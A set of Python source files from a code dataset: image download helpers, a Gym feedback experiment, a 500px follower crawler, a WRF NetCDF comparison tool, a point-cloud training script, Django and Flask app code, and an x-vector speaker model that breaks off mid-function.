(overwrite or not os.path.exists(path)):\n\t\ttry:\n\t\t\tresponse = urllib.request.urlopen(image_url)\n\t\t\timage = response.read(1024)\n\t\t\timage_part = response.read(1024)\n\t\t\twhile image_part:\n\t\t\t\timage += image_part\n\t\t\t\timage_part = response.read(1024)\n\t\t\tresponse.close() \n\t\t\tf = open(path, 'wb')\n\t\t\tf.write(image)\n\t\t\tf.close()\n\t\t\treturn True\n\t\texcept:\n\t\t\tif f:\n\t\t\t\tf.close()\n\t\t\treturn False\n\treturn False\n\ndef save_log(log_message, path):\n\t'''\n\tSaves the log of what occurred. Appends more message into the file, if it exists.\n\t:param log_message: A string of messages of what occurred.\n\t:param path: The path where to save the log file.\n\t'''\n\n\tf = None\n\tif log_message:\n\t\ttry:\n\t\t\tpath = os.path.join(path, \"log_file\")\n\t\t\tif IS_WINDOW:\n\t\t\t\tpath += \".txt\"\n\t\t\tf = open(path, 'a')\n\t\t\tf.write(log_message)\n\t\t\tf.close()\n\t\texcept:\n\t\t\tif f:\n\t\t\t\tf.close()\n\ndef build_url(domain, component):\n\t'''\n\tReturns a url of domain+component if component is a path/query for domain.\n\tIf component is a standalone url, return that.\n\t:param domain: The base url to add to component\n\t:param component: The url to add to the domain of the site.\n\t'''\n\n\tparsed_url = urllib.parse.urlparse(component)\n\tif parsed_url.netloc:\n\t\treturn component if parsed_url.scheme else (\"http://%s\" % component)\n\telse:\n\t\treturn \"%s/%s\" % (domain.rstrip(\"/\"), component.lstrip(\"/\"))\n\ndef process_grab(methods, params, content):\n\t'''\n\tReturns a particular url from content depending on particular methods.\n\t:param methods: Method for how to grab a url.\n\t:param params: Parameter(s) for the method(s).\n\t:param content: The content to extract information from.\n\t'''\n\n\tresult = None\n\n\tif type(methods) is list or type(methods) is tuple:\n\t\t# List of methods and params to use\n\t\ti = 0\n\t\twhile i < len(methods):\n\t\t\tresult = process_grab_call(methods[i], params[i], content)\n\t\t\tif result:\n\t\t\t\treturn result\n\t\t\ti += 1\n\telse:\n\t\t# methods and params are not lists, but particular objects\n\t\tresult = process_grab_call(methods[i], params[i], content)\n\treturn result\n\ndef process_grab_call(finder, param, content):\n\t'''\n\tReturns a particular url from content depending on particular methods.\n\t:param methods: Method for how to grab a url.\n\t:param params: Parameter(s) for the method(s).\n\t:param content: The content to extract information from.\n\tresult = None\n\t'''\n\n\tresult = None\n\n\t# finder is a function\n\t# param is returned used for finder, if applicable\n\tif callable(finder):\n\t\tif param is None:\n\t\t\tresult = finder(content)\n\t\telif type(param) is list or type(param) is tuple:\n\t\t\tresult = finder(content, *param)\n\t\telif type(param) is dict:\n\t\t\tresult = finder(content, **param)\n\t\telse:\n\t\t\tresult = finder(content, param)\n\n\t# finder is a list/tuple with item(s), 0 is regex pattern and 1 is flags\n\t# param is the group for regex pattern return, or 1 if not provided\n\telif type(finder) is list or type(finder) is tuple:\n\t\treg_compile = None\n\t\tif len(finder) > 1:\n\t\t\treg_compile = re.compile(finder[0], finder[1])\n\t\telif len(finder) == 1:\n\t\t\treg_compile = re.compile(finder[0])\n\t\tif reg_compile:\n\t\t\tresult = reg_compile.search(content)\n\t\t\tif result and (type(param) is int or (type(param) is str and param.isnumeric())):\n\t\t\t\tresult = result.group(int(param))\n\t\t\telif result:\n\t\t\t\tresult = result.group(1)\n\t\t\telse:\n\t\t\t\tresult = None\n\n\t# finder is a string that represents a regex pattern\n\t# param is the group for regex pattern return, or 1 if not provided\n\telif type(finder) is str:\n\t\treg_compile = re.compile(finder)\n\t\tresult = reg_compile.search(content)\n\t\tif result and (type(param) is int or (type(param) is str and param.isnumeric())):\n\t\t\tresult = result.group(int(param))\n\t\telif result:\n\t\t\tresult = result.group(1)\n\t\telse:\n\t\t\tresult = None\n\n\t# finder is a compiled regex obj\n\t# param is the group for regex pattern return, or 1 if not provided\n\telif type(finder) == REG_COMPILE_OBJ:\n\t\tresult = finder.search(content)\n\t\tif result and (type(param) is int or (type(param) is str and param.isnumeric())):\n\t\t\tresult = result.group(int(param))\n\t\telif result:\n\t\t\tresult = result.group(1)\n\t\telse:\n\t\t\tresult = None\n\n\treturn result","sub_path":"ImageGrabberBase.py","file_name":"ImageGrabberBase.py","file_ext":"py","file_size_in_byte":14772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"490630978","text":"# FirstOpenAIGym.py\n\nimport gym\nimport os\nimport six\nimport expr_configurator\nfrom expr_configurator import ExperimentConfigurator\nfrom input import user_input\nfrom experiment_saver import counter_saver\nfrom random import randint\n\n\nclass OpenAIGymExperiment:\n def __init__(self):\n self.expr_log_dir = ExperimentConfigurator.getTrainingAndGeneralExprConfig('expr_log_dir')\n self.n_episode = ExperimentConfigurator.getTrainingAndGeneralExprConfig('n_episode')\n self.expr_identifier = ExperimentConfigurator.getTrainingAndGeneralExprConfig('experiment_identifier')\n self.feedback_source = ExperimentConfigurator.getTrainingAndGeneralExprConfig('feedback_source')\n self.image_dir = self.expr_log_dir + '/images'\n\n def run_episodes(self):\n user_input_module = user_input.UserInputModule(is_asyn=True)\n env = gym.make('Assault-v0')\n\n # create images directory\n image_dir = self.image_dir\n if not os.path.exists(image_dir):\n os.makedirs(image_dir)\n\n collected_feedback = {}\n for i_episode in range(self.n_episode):\n env.reset()\n for t in range(10000):\n env.render()\n\n # collect human feedback\n feedback = 0\n if self.feedback_source == expr_configurator.HUMAN_FEEDBACK:\n action = env.action_space.sample()\n human_feedback = user_input_module.getInput()\n if human_feedback is None:\n feedback = 0\n else:\n print(human_feedback)\n if human_feedback == 'a':\n feedback = -1\n elif human_feedback == 's':\n feedback = 1\n else:\n feedback = 0\n # get agent feedback\n else:\n action = env.action_space.sample()\n feedback = randint(-1, 1)\n\n observation, reward, done, info = env.step(action)\n observation_identifier = self.expr_identifier + '_' + str(i_episode).zfill(5) + '_' + str(t).zfill(6)\n env.env.ale.saveScreenPNG(six.b(self.image_dir + '/' + observation_identifier + '.png'))\n collected_feedback[observation_identifier] = str(action) + ',' + str(reward) + ',' + str(feedback)\n\n if done:\n print(\"Episode finished after {} time steps\".format(t + 1))\n break\n\n counter_saver.saveDictToFile(self.expr_log_dir + '/' + 'collected_feedback.txt', collected_feedback)\n env.close()\n user_input_module.stop()\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"Week 3/Experiment/environment/FirstOpenAIGym.py","file_name":"FirstOpenAIGym.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"11041278","text":"import requests\nimport threading\nfrom redis import StrictRedis\nimport pymongo\n\n############### mongo 部分 ###############\nDATABASE_IP = '127.0.0.1'\nDATABASE_PORT = 27017\nDATABASE_NAME = 'sun'\nclient = pymongo.MongoClient(DATABASE_IP, DATABASE_PORT)\ndb = client.sun\ndb.authenticate('dba', 'dba')\ncollection = db['500px']\n############# mongo 部分 end #############\n\n############### redis 部分 ###############\nredis = StrictRedis(host='localhost', port=6379, db=1, decode_responses=True)\n############# redis 部分 end #############\n\n############## 全局参数部分 ###############\nSTART_URL = 'https://500px.me/community/v2/user/indexInfo?queriedUserId={}' # 入口链接\nCOMMENT = 'https://500px.me/community/res/relation/{}/follow?startTime=&page={}&size=100&type=json'\nHEADERS = {\n 'Accept': 'application/json',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest'\n}\nneed_crawlids = [] # 待爬取的 userid\nlock = threading.Lock()\n############ 全局参数部分 end #############\n\ndef get_followee():\n try:\n res = requests.get(START_URL.format('5769e51a04209a9b9b6a8c1e656ff9566'), headers=HEADERS, timeout=3)\n data = res.json()\n if data:\n totle = int(data['data']['userFolloweeCount']) # 关注数\n userid = data['data']['id'] # 返回用户 ID\n return {\n 'userid': userid,\n 'totle': totle\n }\n except Exception as e:\n print('数据获取错误')\n print(e)\n\nclass Product(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self._headers = HEADERS\n\n def get_follows(self, userid, totle):\n try:\n res = requests.get(COMMENT.format(userid, totle), headers=HEADERS, timeout=3)\n data = res.json()\n if data:\n for item in data:\n yield {\n 'userid': item['id'],\n 'totle': item['userFolloweeCount']\n }\n except Exception as e:\n print('错误信息')\n print(e)\n self.get_follows(userid, totle)\n\n def run(self):\n while 1:\n global need_crawlids\n if lock.acquire():\n if len(need_crawlids) == 0:\n continue\n data = need_crawlids[0]\n del need_crawlids[0]\n lock.release()\n if data['totle'] == 0:\n continue\n for page in range(1, data['total'] // 100 + 2): # '//' 取整除,返回商的整数部分(向下取整)\n for i in self.get_follows(data['userid'], page):\n if lock.acquire():\n need_crawlids.append(i)\n lock.release()\n self.save_redis(i) # 存储到 redis 中\n\n def save_redis(self, data):\n redis.setnx(data['userid'], data['totle'])\n\nclass Consumer(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n \n def run(self):\n while 1:\n key = redis.randomkey() # 随机获取一个 key\n if key:\n # 删除获取到的 key\n redis.delete(key)\n self.get_info(key)\n\n def get_info(self, key):\n try:\n res = requests.get(START_URL.format(key), headers=HEADERS, timeout=3)\n data = res.json()\n if data['status'] == 200:\n collection.insert(data['data']) # 插入 mongodb 中\n except Exception as e:\n print(e)\n return\n\n\nif __name__ == '__main__':\n start = get_followee()\n need_crawlids.append(start)\n\n p = Product()\n p.start()\n\n for i in range(1, 5):\n c = Consumer()\n c.start()","sub_path":"500px/500px.py","file_name":"500px.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"33904382","text":"# WRF-CMake Automated Testing Suite (WATS) (https://github.com/WRF-CMake/wats).\n# Copyright 2018 M. Riechert and D. Meyer. Licensed under the MIT License.\n\nfrom typing import Tuple, Union, List, Set, Optional\nimport logging\nfrom collections import namedtuple\n\nimport numpy as np\nfrom numpy import ma\nimport netCDF4 as nc\nimport wrf\n\nfrom wats.util import get_log_level\n\ndef read_var(ds: nc.Dataset, name: str, time_idx: Optional[int]=None) -> np.array:\n if name == 'KE':\n u = wrf.getvar(ds, 'U', time_idx, squeeze=False).values\n v = wrf.getvar(ds, 'V', time_idx, squeeze=False).values\n w = wrf.getvar(ds, 'W', time_idx, squeeze=False).values\n dims = ds.dimensions\n bottom_top = dims['bottom_top'].size\n south_north = dims['south_north'].size\n west_east = dims['west_east'].size\n u = u[:,:bottom_top,:south_north,:west_east]\n v = v[:,:bottom_top,:south_north,:west_east]\n w = w[:,:bottom_top,:south_north,:west_east]\n var = 0.5 * (u**2 + v**2 + w**2)\n else:\n try:\n var = wrf.getvar(ds, name, time_idx, squeeze=False).values\n except:\n var = ds.variables[name][:]\n if time_idx is not None:\n var = var[time_idx:time_idx+1]\n return var\n\ndef calc_rel_error(var_ref: np.array, var_trial: np.array) -> np.array:\n ref_zeros = var_ref == 0\n trial_nonzeros_cnt = np.count_nonzero(var_trial[ref_zeros])\n if trial_nonzeros_cnt > 0:\n raise ValueError(f'Reference contains {trial_nonzeros_cnt} points with zero where trial is non-zero')\n\n with np.errstate(divide='ignore'):\n rel_error = (var_trial - var_ref) / var_ref\n rel_error[ref_zeros] = 0\n\n return rel_error\n\ndef calc_rel_error_range_normalised(var_ref: np.array, var_trial: np.array) -> np.array:\n err = var_trial - var_ref\n ref_range = calc_range(var_ref)\n\n if ref_range == 0:\n raise ValueError('ref_range == 0')\n\n rel_error = err / ref_range\n return rel_error\n\ndef calc_rel_error_iqr_normalised(var_ref: np.array, var_trial: np.array) -> np.array:\n err = var_trial - var_ref\n ref_iqr = calc_iqr(var_ref)\n\n if ref_iqr == 0:\n raise ValueError('ref_iqr == 0')\n\n rel_error = err / ref_iqr\n return rel_error\n\ndef calc_range(arr: np.array) -> float:\n range_ = np.max(arr) - np.min(arr)\n return range_\n\ndef calc_iqr(arr: np.array) -> float:\n q1, q3 = np.percentile(arr, [25, 75])\n iqr = q3 - q1\n return iqr\n\ndef compare_categorical_var(var1: np.array, var2: np.array, name: str, tol_percentage: float) -> bool:\n mismatches = np.count_nonzero(var1 != var2)\n ratio = mismatches / var1.size\n equal = ratio*100 <= tol_percentage\n logging.log(get_log_level(equal), \n \"{}: category mismatches {:.4f}% ({} of {} pixels) {}\".format(\n name,\n ratio*100, mismatches, var1.size,\n ('' if equal else ' -> ABOVE THRESHOLD')))\n return equal\n\ndef compare_continuous_var(var_ref: np.array, var_trial: np.array, name: str, tol: float, mean: bool) -> bool:\n try:\n rel_error = calc_rel_error(var_ref, var_trial)\n except ValueError as e:\n logging.error('{}: {}'.format(name, e))\n return False\n\n rel_error_abs = abs(rel_error)\n\n max_rel_diff = rel_error_abs.max()\n mean_rel_diff = rel_error_abs.mean()\n \n if mean:\n equal = mean_rel_diff <= tol\n extra = ''\n else:\n above_thresh = rel_error_abs > tol\n above_thresh_count = np.count_nonzero(above_thresh)\n equal = above_thresh_count == 0\n extra = '' if equal else ' ({} pixels)'.format(above_thresh_count)\n\n logging.info(\n '{}: reference mean={:.3e} stddev={:.3e} min={:.3e} max={:.3e}'.format(\n name, var_ref.mean(), var_ref.std(), var_ref.min(), var_ref.max()))\n\n logging.info(\n '{}: trial mean={:.3e} stddev={:.3e} min={:.3e} max={:.3e}'.format(\n name, var_trial.mean(), var_trial.std(), var_trial.min(), var_trial.max()))\n\n logging.log(get_log_level(equal), \n \"{}: relative error max={:.4f}% mean={:.4f}%{}\".format(\n name,\n max_rel_diff*100, mean_rel_diff*100,\n ('' if equal else ' -> ABOVE THRESHOLD') + extra))\n\n return equal\n\ndef compare_var(var_ref: np.array, var_trial: np.array, \n name: str, is_categorical: bool,\n no_data: Optional[Union[float,int]],\n tol: float, mean=False) -> bool:\n if var_ref.shape != var_trial.shape:\n raise RuntimeError(f'Shape mismatch for {name}: {var_ref.shape} != {var_trial.shape}')\n \n is_numeric = np.issubdtype(var_ref.dtype, np.number)\n\n if no_data is not None and is_numeric:\n var_ref = ma.masked_equal(var_ref, no_data)\n var_trial = ma.masked_equal(var_trial, no_data)\n assert (var_ref.mask == var_trial.mask).all()\n if var_ref.mask.all():\n logging.error('{} has only missing values!')\n return False\n\n if not is_numeric:\n if (var_ref != var_trial).any():\n logging.error(f'Non-numeric mismatch for {name}: {var_ref} != {var_trial}')\n return False\n return True\n elif is_categorical:\n return compare_categorical_var(var_ref, var_trial, name, tol)\n else:\n return compare_continuous_var(var_ref, var_trial, name, tol, mean)\n\ndef compare(path_ref: str, path_trial: str, \n var_names_categorical: List[str], \n var_names_continuous: List[str],\n no_data: Optional[Union[float,int]],\n tol_continuous: float, tol_categorical: float,\n mean=False) -> bool:\n nc_ref = nc.Dataset(path_ref, 'r')\n nc_trial = nc.Dataset(path_trial, 'r')\n\n var_names = {var_name: True for var_name in var_names_categorical}\n var_names.update({var_name: False for var_name in var_names_continuous})\n\n file_equal = True\n for var_name, is_categorical in sorted(var_names.items()):\n try:\n var_ref = read_var(nc_ref, var_name)\n except Exception as e:\n logging.info(f'\"{var_name}\" not found or problem opening: {e}. Ignoring.')\n continue\n var_trial = read_var(nc_trial, var_name)\n\n tol = tol_categorical if is_categorical else tol_continuous\n\n try:\n var_equal = compare_var(var_ref, var_trial, var_name, is_categorical, no_data, tol, mean)\n except Exception as e:\n logging.error(f'Error processing \"{var_name}\": {e}', exc_info=e)\n var_equal = False\n file_equal = file_equal and var_equal\n return file_equal\n","sub_path":"wats/nccmp.py","file_name":"nccmp.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"535851978","text":"import time\nimport copy\nimport numpy as np\nimport math\n\nfrom options import Options\nopt = Options().parse() # set CUDA_VISIBLE_DEVICES before import torch\n\nimport torch\nimport torchvision\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport random\nimport numpy as np\n\nfrom models.classifier import Model\nfrom data.modelnet_shrec_loader import ModelNet_Shrec_Loader\nfrom util.visualizer import Visualizer\n\n\nif __name__=='__main__':\n trainset = ModelNet_Shrec_Loader(opt.dataroot, 'train', opt)\n dataset_size = len(trainset)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=opt.batch_size, shuffle=True, num_workers=opt.nThreads)\n print('#training point clouds = %d' % len(trainset))\n\n testset = ModelNet_Shrec_Loader(opt.dataroot, 'val', opt)\n testloader = torch.utils.data.DataLoader(testset, batch_size=opt.batch_size, shuffle=False, num_workers=opt.nThreads)\n\n # create model, optionally load pre-trained model\n model = Model(opt)\n if opt.pretrain is not None:\n model.encoder.load_state_dict(torch.load(opt.pretrain))\n ############################# automation for ModelNet10 / 40 configuration ####################\n # if opt.classes == 10:\n # opt.lr = opt.lr * 0.1\n # opt.dropout = opt.dropout + 0.1\n ############################# automation for ModelNet10 / 40 configuration ####################\n\n visualizer = Visualizer(opt)\n\n best_accuracy = 0\n for epoch in range(201):\n\n epoch_iter = 0\n for i, data in enumerate(trainloader):\n iter_start_time = time.time()\n epoch_iter += opt.batch_size\n\n input_pc, input_sn, input_label, input_node, input_node_knn_I = data\n model.set_input(input_pc, input_sn, input_label, input_node, input_node_knn_I)\n\n model.optimize(epoch=epoch)\n\n if i % 600 == 0:\n # print/plot errors\n t = (time.time() - iter_start_time) / opt.batch_size\n\n errors = model.get_current_errors()\n\n visualizer.print_current_errors(epoch, epoch_iter, errors, t)\n visualizer.plot_current_errors(epoch, float(epoch_iter) / dataset_size, opt, errors)\n\n # print(model.autoencoder.encoder.feature)\n # visuals = model.get_current_visuals()\n # visualizer.display_current_results(visuals, epoch, i)\n\n # test network\n if epoch >= 0 and epoch%1==0:\n batch_amount = 0\n model.test_loss.data.zero_()\n model.test_accuracy.data.zero_()\n for i, data in enumerate(testloader):\n input_pc, input_sn, input_label, input_node, input_node_knn_I = data\n model.set_input(input_pc, input_sn, input_label, input_node, input_node_knn_I)\n model.test_model()\n\n batch_amount += input_label.size()[0]\n\n # # accumulate loss\n model.test_loss += model.loss.detach() * input_label.size()[0]\n\n # # accumulate accuracy\n _, predicted_idx = torch.max(model.score.data, dim=1, keepdim=False)\n correct_mask = torch.eq(predicted_idx, model.input_label).float()\n test_accuracy = torch.mean(correct_mask).cpu()\n model.test_accuracy += test_accuracy * input_label.size()[0]\n\n model.test_loss /= batch_amount\n model.test_accuracy /= batch_amount\n if model.test_accuracy.item() > best_accuracy:\n best_accuracy = model.test_accuracy.item()\n print('Tested network. So far best: %f' % (best_accuracy) )\n\n # save network\n saving_acc_threshold = 0.89\n if model.test_accuracy.item() > saving_acc_threshold:\n print(\"Saving network...\")\n model.save_network(model.encoder, 'encoder', '%d_%f' % (epoch, model.test_accuracy.item()), opt.gpu_id)\n model.save_network(model.classifier, 'classifier', '%d_%f' % (epoch, model.test_accuracy.item()), opt.gpu_id)\n\n # learning rate decay\n if opt.classes == 10:\n lr_decay_step = 40\n else:\n lr_decay_step = 20\n if epoch%lr_decay_step==0 and epoch>0:\n model.update_learning_rate(0.5)\n # batch normalization momentum decay:\n next_epoch = epoch + 1\n if (opt.bn_momentum_decay_step is not None) and (next_epoch >= 1) and (\n next_epoch % opt.bn_momentum_decay_step == 0):\n current_bn_momentum = opt.bn_momentum * (\n opt.bn_momentum_decay ** (next_epoch // opt.bn_momentum_decay_step))\n print('BN momentum updated to: %f' % current_bn_momentum)\n\n # save network\n # if epoch%20==0 and epoch>0:\n # print(\"Saving network...\")\n # model.save_network(model.classifier, 'cls', '%d' % epoch, opt.gpu_id)\n\n\n\n\n\n","sub_path":"shrec16/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"110002239","text":"from django.conf.urls import patterns, url, include\nfrom django.conf import settings\n\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'web.apps.gallery.views.home'),\n url(r'^gallery/', include('web.apps.gallery.urls')),\n\n # Register view\n url(r'^register', \"web.apps.gallery.views.register\"),\n\n # Search view\n url(r'^search$', \"web.apps.gallery.views.search\"),\n\n # Login view\n url(r'^login$', \"web.apps.gallery.views.auth\"),\n\n # Logout view\n url(r'^logout$', \"web.apps.gallery.views.sign_out\"),\n\n # Upload view\n url(r'^upload$', \"web.apps.gallery.views.upload\"),\n\n # Examples:\n # url(r'^$', 'web.views.home', name='home'),\n # url(r'^web/', include('web.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n )\n\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n url(r'^data/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n url(r'^static/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT,\n }),\n )\n","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"144823765","text":"from django.core.management import BaseCommand\nfrom django.db.backends.utils import logger\n\n\nfrom industry.models import Industry\nfrom company.models import Company\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n logger.info('Correcting Industry data...')\n industry = Industry.objects.get(pk=24)\n companies = Company.objects.filter(industry=industry)\n\n for company in companies:\n company.industry = Industry.objects.get(pk=1)\n company.save()\n\n industry.delete()\n logger.info('Finished changes.')\n","sub_path":"industry/management/commands/fix_empty_industry.py","file_name":"fix_empty_industry.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"170005141","text":"from flask import Flask\nfrom flask_restful import Api, Resource, reqparse, abort, marshal_with, fields\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom datetime import date\nfrom transformers import pipeline, Conversation\n\nconversational_pipeline = pipeline(\"conversational\")\nconversation_1 = Conversation(\"Hello\")\n\napp = Flask(__name__)\napi = Api(app)\nCORS(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'\ndb = SQLAlchemy(app)\n\nfrom datetime import datetime\n\n\nclass JournelModel(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n body = db.Column(db.String)\n date = db.Column(db.String)\n time = db.Column(db.String)\n bot_output = db.Column(db.String)\n\n\ndb.create_all()\n\nmodel_put_args = reqparse.RequestParser()\nmodel_put_args.add_argument(\"name\", type=str, help=\"Name\")\nmodel_put_args.add_argument(\"body\", type=str, help=\"body\")\n\nbot_args = reqparse.RequestParser()\nbot_args.add_argument(\"input\", type=str, help=\"input\")\n\nresource_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'body': fields.String,\n 'date': fields.String,\n 'time': fields.String,\n 'bot_output': fields.String\n}\n\n\nclass Model(Resource):\n\n @marshal_with(resource_fields)\n def get(self, model_id):\n result = JournelModel.query.filter_by(id=model_id).first()\n if not result:\n abort(404, message=\"Could not find with that id\")\n return result\n\n @marshal_with(resource_fields)\n def delete(self, model_id):\n result = JournelModel.query.filter_by(id=model_id).first()\n if not result:\n abort(404, message=\"Could not find video with that id\")\n db.session.delete(result)\n db.session.commit()\n return 200\n\n\napi.add_resource(Model, \"/model/\")\n\n\nclass Model_all(Resource):\n\n @marshal_with(resource_fields)\n def get(self):\n result = JournelModel.query.all()\n return result\n\n @marshal_with(resource_fields)\n def post(self):\n args = model_put_args.parse_args()\n conversation_1.add_user_input(args['body'])\n output = str(conversational_pipeline([conversation_1])).splitlines()[-1].replace('bot >>', '')\n\n model = JournelModel(name=args['name'], body=args['body'], date=date.today(),\n time=datetime.now().strftime(\"%H:%M:%S\"), bot_output=output )\n\n db.session.add(model)\n db.session.commit()\n return 201\n\napi.add_resource(Model_all, \"/model\")\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"241609046","text":"# -*- coding:utf-8 -*-\n\n# Copyright xmuspeech (Author: Snowdar 2020-02-05)\nimport time\nimport math\nimport torch\nimport torch.nn.functional as F\nimport libs.support.utils as utils\n\nfrom libs.nnet import *\n\nclass Xvector(TopVirtualNnet):\n \"\"\" A composite x-vector framework \"\"\"\n \n ## Base parameters - components - loss - training strategy.\n def init(self, inputs_dim, num_targets, extend=False, skip_connection=False, \n mixup=False, mixup_alpha=1.0,\n specaugment=False, specaugment_params={},\n aug_dropout=0., context_dropout=0., hidden_dropout=0., dropout_params={},\n SE=False, se_ratio=4,\n tdnn_layer_params={},\n tdnn6=True, tdnn7_params={},\n pooling=\"statistics\", pooling_params={},\n margin_loss=False, margin_loss_params={},\n use_step=False, step_params={},\n transfer_from=\"softmax_loss\",\n training=True, extracted_embedding=\"far\"):\n\n ## Params.\n default_dropout_params = {\n \"type\":\"default\", # default | random\n \"start_p\":0.,\n \"dim\":2,\n \"method\":\"uniform\", # uniform | normals\n \"continuous\":False,\n \"inplace\":True\n }\n\n default_tdnn_layer_params = {\n \"nonlinearity\":'relu', \"nonlinearity_params\":{\"inplace\":True},\n \"bn-relu\":False, \"bn\":True, \"bn_params\":{\"momentum\":0.5, \"affine\":False, \"track_running_stats\":True}\n }\n\n default_pooling_params = {\n \"num_nodes\":1500,\n \"num_head\":1,\n \"share\":True,\n \"affine_layers\":1,\n \"hidden_size\":64,\n \"context\":[0],\n \"stddev\":True,\n \"temperature\":False, \n \"fixed\":True,\n \"stddev\":True\n }\n\n default_margin_loss_params = {\n \"method\":\"am\", \"m\":0.2, \n \"feature_normalize\":True, \"s\":30, \n \"double\":False,\n \"mhe_loss\":False, \"mhe_w\":0.01,\n \"inter_loss\":0.,\n \"ring_loss\":0.,\n \"curricular\":False\n }\n\n default_step_params = {\n \"T\":None,\n \"m\":False, \"lambda_0\":0, \"lambda_b\":1000, \"alpha\":5, \"gamma\":1e-4,\n \"s\":False, \"s_tuple\":(30, 12), \"s_list\":None,\n \"t\":False, \"t_tuple\":(0.5, 1.2), \n \"p\":False, \"p_tuple\":(0.5, 0.1)\n }\n\n dropout_params = utils.assign_params_dict(default_dropout_params, dropout_params)\n tdnn_layer_params = utils.assign_params_dict(default_tdnn_layer_params, tdnn_layer_params)\n # If param is not be specified, default it w.r.t tdnn_layer_params.\n tdnn7_params = utils.assign_params_dict(tdnn_layer_params, tdnn7_params)\n pooling_params = utils.assign_params_dict(default_pooling_params, pooling_params)\n margin_loss_params = utils.assign_params_dict(default_margin_loss_params, margin_loss_params)\n step_params = utils.assign_params_dict(default_step_params, step_params)\n\n ## Var.\n self.skip_connection = skip_connection\n self.use_step = use_step\n self.step_params = step_params\n\n self.extracted_embedding = extracted_embedding # For extract.\n \n ## Nnet.\n # Head\n self.mixup = Mixup(alpha=mixup_alpha) if mixup else None\n self.specaugment = SpecAugment(**specaugment_params) if specaugment else None\n self.aug_dropout = get_dropout_from_wrapper(aug_dropout, dropout_params)\n self.context_dropout = ContextDropout(p=context_dropout) if context_dropout > 0 else None\n self.hidden_dropout = get_dropout_from_wrapper(hidden_dropout, dropout_params)\n\n # Frame level\n self.tdnn1 = ReluBatchNormTdnnLayer(inputs_dim,512,[-2,-1,0,1,2], **tdnn_layer_params)\n self.tdnn2 = ReluBatchNormTdnnLayer(512,512,[-2,0,2], **tdnn_layer_params)\n self.se2 = SEBlock(512, ratio=se_ratio) if SE else None\n self.tdnn3 = ReluBatchNormTdnnLayer(512,512,[-3,0,3], **tdnn_layer_params)\n self.tdnn4 = torch.nn.Conv1d(512, 256, kernel_size=1, bias=False)\n num_nodes = pooling_params.pop(\"num_nodes\")\n # Pooling\n stddev = pooling_params.pop(\"stddev\")\n \n assert pooling == \"serialized-attention\"\n self.stats = SerializedMultiHeadMultiLayerAttention(num_nodes, affine_layers=pooling_params[\"affine_layers\"], hidden_size=pooling_params[\"hidden_size\"], context=pooling_params[\"context\"])\n stats_dim = self.stats.get_output_dim()\n\t # Segment level\n tdnn7_dim = stats_dim\n\n if tdnn7_params[\"nonlinearity\"] == \"default\":\n tdnn7_params[\"nonlinearity\"] = tdnn_layer_params[\"nonlinearity\"]\n\n self.tdnn7 = ReluBatchNormTdnnLayer(tdnn7_dim, 512, **tdnn7_params)\n\n # Loss\n # Do not need when extracting embedding.\n if training :\n if margin_loss:\n self.loss = MarginSoftmaxLoss(512, num_targets, **margin_loss_params)\n else:\n self.loss = SoftmaxLoss(512, num_targets)\n\n self.wrapper_loss = MixupLoss(self.loss, self.mixup) if mixup else None\n\n # An example to using transform-learning without initializing loss.affine parameters\n self.transform_keys = [\"tdnn1\",\"tdnn2\",\"tdnn3\",\"stats\",\"tdnn6\",\"tdnn7\",\n \"ex_tdnn1\",\"ex_tdnn2\",\"ex_tdnn3\",\"ex_tdnn4\",\"ex_tdnn5\",\n \"se1\",\"se2\",\"se3\",\"se4\",\"loss\"]\n\n if margin_loss and transfer_from == \"softmax_loss\":\n # For softmax_loss to am_softmax_loss\n self.rename_transform_keys = {\"loss.affine.weight\":\"loss.weight\"} \n\n @utils.for_device_free\n def forward(self, inputs):\n \"\"\"\n @inputs: a 3-dimensional tensor (a batch), including [samples-index, frames-dim-index, frames-index]\n \"\"\"\n x = inputs\n x = self.tdnn1(x)\n x = self.tdnn2(x)\n 